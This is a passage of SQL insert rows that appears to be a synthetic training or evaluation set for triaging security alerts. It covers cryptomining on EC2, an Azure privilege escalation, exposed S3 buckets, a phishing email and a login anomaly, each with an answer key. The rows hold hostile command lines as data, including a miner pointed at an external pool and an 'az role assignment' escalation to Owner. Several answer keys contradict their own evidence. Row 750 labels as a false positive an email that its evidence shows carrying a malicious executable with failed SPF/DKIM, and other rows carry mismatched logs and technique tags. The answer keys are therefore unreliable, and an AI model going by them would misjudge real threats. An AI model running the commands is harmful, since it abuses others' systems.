2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.396Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"GCP-VM-01\\\",\\\"command_line\\\":\\\"powershell -enc aGVsbG8gd29ybGQ=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(750, 'Suspicious Email Detected - Potential False Positive', 'medium', 'Proofpoint Email Gateway', 'An email containing a link to an external website was flagged as suspicious but appears to be from a trusted source.', 'Phishing', 'T1566', 0, 'Closed', 42, '{\"timestamp\":\"2026-01-11T10:25:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.20\",\"username\":\"employee@example.com\",\"hostname\":\"N/A\",\"email_sender\":\"trusted.source@example.com\",\"request_body\":\"Please review the attached document: https://example-trusted-site.com/document\"}', '2026-01-10 11:44:36', '2026-03-12 12:15:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted email provider\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://example-trusted-site.com/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL belongs to a trusted and verified domain\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted.source@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"clean\",\"details\":\"Email address registered to a known and trusted organization\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Despite initial suspicion, the email was verified to be from a trusted source with clean OSINT results.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected - Potential False Positive\",\"date\":\"2026-02-01T20:32:22.397Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(751, 'Potential Crypto Mining Activity on AWS EC2 Instance', 'high', 'AWS GuardDuty', 'GuardDuty detected anomalous CPU usage patterns consistent with crypto mining on an EC2 instance. This activity is often indicative of unauthorized resource usage.', 'Malware', 'T1496', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:23:45Z\",\"event_type\":\"anomalous_usage\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.78\",\"username\":\"ec2-user\",\"hostname\":\"ec2-192-168-1-10.compute-1.amazonaws.com\",\"command_line\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\"}', '2026-01-10 12:48:36', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to AWS EC2 instance\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 547 times for crypto mining activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known command line for crypto mining operations\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known crypto mining command indicates unauthorized resource usage.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.398Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:23:45Z\\\",\\\"event_type\\\":\\\"anomalous_usage\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.78\\\",\\\"username\\\":\\\"ec2-user\\\",\\\"hostname\\\":\\\"ec2-192-168-1-10.compute-1.amazonaws.com\\\",\\\"command_line\\\":\\\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(752, 'Suspicious IAM Privilege Escalation in Azure', 'critical', 'Azure Sentinel', 'A user account was detected attempting to assign itself higher privileges through an unusual method. This could indicate a compromised account.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"52.233.123.45\",\"username\":\"john.doe\",\"hostname\":\"azure-vm-01\",\"command_line\":\"az role assignment create --assignee john.doe --role Owner\"}', '2026-01-10 17:50:25', '2026-02-16 18:03:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Azure VM\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"52.233.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee john.doe --role Owner\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command line used is indicative of unauthorized privilege escalation.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.400Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"52.233.123.45\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"command_line\\\":\\\"az role assignment create --assignee john.doe --role Owner\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(753, 'Exposed S3 Bucket Detected in AWS', 'medium', 'AWS CloudTrail', 'A public read/write permission was detected on an S3 bucket, potentially exposing sensitive data.', 'Data Exfiltration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:42:05Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"13.54.32.123\",\"username\":\"admin\",\"hostname\":\"cloud.aws.local\",\"request_body\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\"}', '2026-01-09 16:19:33', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of AWS management console\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Exposing S3 bucket with public read/write permissions\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public read/write permissions on a sensitive S3 bucket are a security risk.\"}', 'Intermediate', 'CLOUD', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(754, 'False Positive: Unusual Login Attempt Detected', 'low', 'Splunk', 'A login attempt from a new location was detected for user \'alice.smith\', but further investigation revealed this was a legitimate business trip.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.101\",\"dst_ip\":\"203.0.113.10\",\"username\":\"alice.smith\",\"hostname\":\"vpn.company.com\",\"failed_attempts\":\"3\"}', '2026-01-10 10:38:35', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not reported for malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"alice.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"clean\",\"details\":\"User confirmed to be on a business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The user\'s travel itinerary confirms this was a legitimate login attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(755, 'Exposed AWS S3 Bucket Detected', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, potentially exposing sensitive data. Immediate action is required to secure data.', 'Data Exfiltration', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"bucket_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"user123\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"\",\"bucket_name\":\"sensitive-data-bucket\",\"access_policy\":\"public-read\"}', '2026-01-10 02:30:01', '2026-02-17 05:27:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 142 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"bucket_name\",\"value\":\"sensitive-data-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"internal\",\"details\":\"Exposed bucket found on AWS\"}}],\"expected_actions\":[\"block_ip\",\"secure_bucket\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The public access policy on the S3 bucket is a clear indicator of misconfiguration leading to potential data exposure.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 